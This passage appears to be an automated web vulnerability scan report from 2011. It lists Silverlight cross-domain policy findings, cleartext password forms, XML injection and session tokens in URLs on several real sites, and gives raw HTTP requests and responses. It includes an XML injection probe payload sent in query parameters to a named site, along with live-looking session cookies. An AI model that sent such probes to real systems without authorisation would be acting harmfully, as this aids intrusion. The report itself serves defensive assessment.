xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Thu, 21 Jul 2011 16:13:59 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www333
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.apple.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:07 GMT
Server: Omniture DC/2.0.0
xserver: www647
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://rad.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.7. http://i.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Thu, 21 Jul 2011 20:05:06 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.mic
...[SNIP]...
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.8. http://i3.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i3.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i3.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=885
Date: Thu, 21 Jul 2011 20:05:21 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
...[SNIP]...
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.9. http://www.microsoft.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 2796742500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:16 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.0.mybcdna.com
Path:   /JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /JavaScript/apps/HomeBeforeLogin/hblv2.js?68769 HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 16 Jun 2011 15:10:15 GMT
ETag: "2230425394"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 274737
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</h4>';content+='<form method="post" id="login_form" action="'+MyYearbook.URLs.ssl+'login">';content+='<div class="login_fields">
...[SNIP]...
<dd><input type="password" class="text" name="password"/> </dd>
...[SNIP]...

6.2. http://forums.vostu.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.vostu.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.9.7.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:13:49 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastvisit=1311275629; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_languageid=2; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_userstyleid=8; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Content-Length: 88918
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<label for="username">
...[SNIP]...
</label>

<input id="navbar_password" type="password" value="" tabindex="102" accesskey="u" name="vb_login_password" />

</p>
...[SNIP]...

6.3. http://forums.vostu.com/forums/41-Como-Jogar  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.vostu.com
Path:   /forums/41-Como-Jogar

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /forums/41-Como-Jogar HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://forums.vostu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.12.4.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Az_lastvisit=1311275630; Az_lastactivity=0; Az_userstyleid=8; Az_languageid=2

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:14:19 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:14:19 GMT; path=/
Set-Cookie: Az_forum_view=7139c26eb82c8e78808f0b999029d51072882d5ca-1-%7Bi-41_i-1311275659_%7D; path=/
Content-Length: 66284
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Senha" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Conectar" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profil
...[SNIP]...

6.4. http://static.curse.com/themes/common/v6/scripts/core.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.curse.com
Path:   /themes/common/v6/scripts/core.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /themes/common/v6/scripts/core.js?LastChanged=634456582020000000 HTTP/1.1
Host: static.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: application/x-javascript
Last-Modified: Tue, 17 May 2011 16:36:49 GMT
Accept-Ranges: bytes
ETag: "80e6539eb014cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:22 GMT
Content-Length: 324214

/* D:\Projects\Curse\trunk\Curse.com\source\Curse.Build\..\Curse.Web\Themes\Common\v6\scripts\core\100-jquery.js */

(function(){var
window=this,undefined,_jQuery=window.jQuery,_$=window.$,jQuery=wind
...[SNIP]...
</p><form method="post" action="'+url+'"><input name="next" value="'+window.location.href+'" type="hidden" />
...[SNIP]...
</label> <input id="id_password" name="password" maxlength="30" type="password"></div>
...[SNIP]...

6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boston.com
Path:   /lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links HTTP/1.1
Host: www.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=5; _chartbeat2=2gl4d8yk23g2sl2m

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:28 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Sun, 26-Jun-2016 13:48:13 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: tjanefer
Content-Type: text/html
Set-Cookie: bcpage=7;expires=Sun, 26-Jun-2016 13:48:14 GMT;path=/;domain=boston.com;
Content-Length: 49839
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>


<title>Facebook, Twitter obligations persist during vacations - The
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

7. XML injection  previous  next
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The h parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the h parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244]]>>&w=436&c=1 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:14:51 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:14:51 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*.....    ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

7.2. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The w parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the w parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244&w=436]]>>&c=1 HTTP/1.1
Host: www.scmagazineus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: ASP.NET_SessionId=lwqoj3yh0qnnva0n4ikj33sk

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 22 Jul 2011 21:15:41 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:15:40 GMT
Content-Length: 141832

......JFIF.....,.,......Adobe.d....... .Exif..MM.*.....    ...........z.....................................(...........1...........2...........;...........i..............In this Sept. 24, 2010, file pho
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...

8. Session token in URL  previous  next
There are 20 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://assets.0.mybcdna.com
Path:   /JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /JavaScript/apps/HomeBeforeLogin/hblv2.js?68769 HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 16 Jun 2011 15:10:15 GMT
ETag: "2230425394"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 274737
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</p><img src="https://h.online-metrix.net/fp/clear.png?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '&m=2"alt=""><script src="https://h.online-metrix.net/fp/check.js?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"type="text/javascript"></script><object type="application/x-shockwave-flash"data="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"width="1"height="1"id="obj_id"><param name="movie"value="https://h.online-metrix.net/fp/fp.swf?org_id=u8fxw6sf&session_id=' + threatMetrixSessionId + '"/>
...[SNIP]...

8.2. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bostonglobe.tt.omtrdc.net
Path:   /m2/bostonglobe/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:48:14 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 168
Date: Sat, 23 Jul 2011 13:48:13 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

8.3. http://games.myyearbook.com/  previous  next

Summary

Severity:   Medium
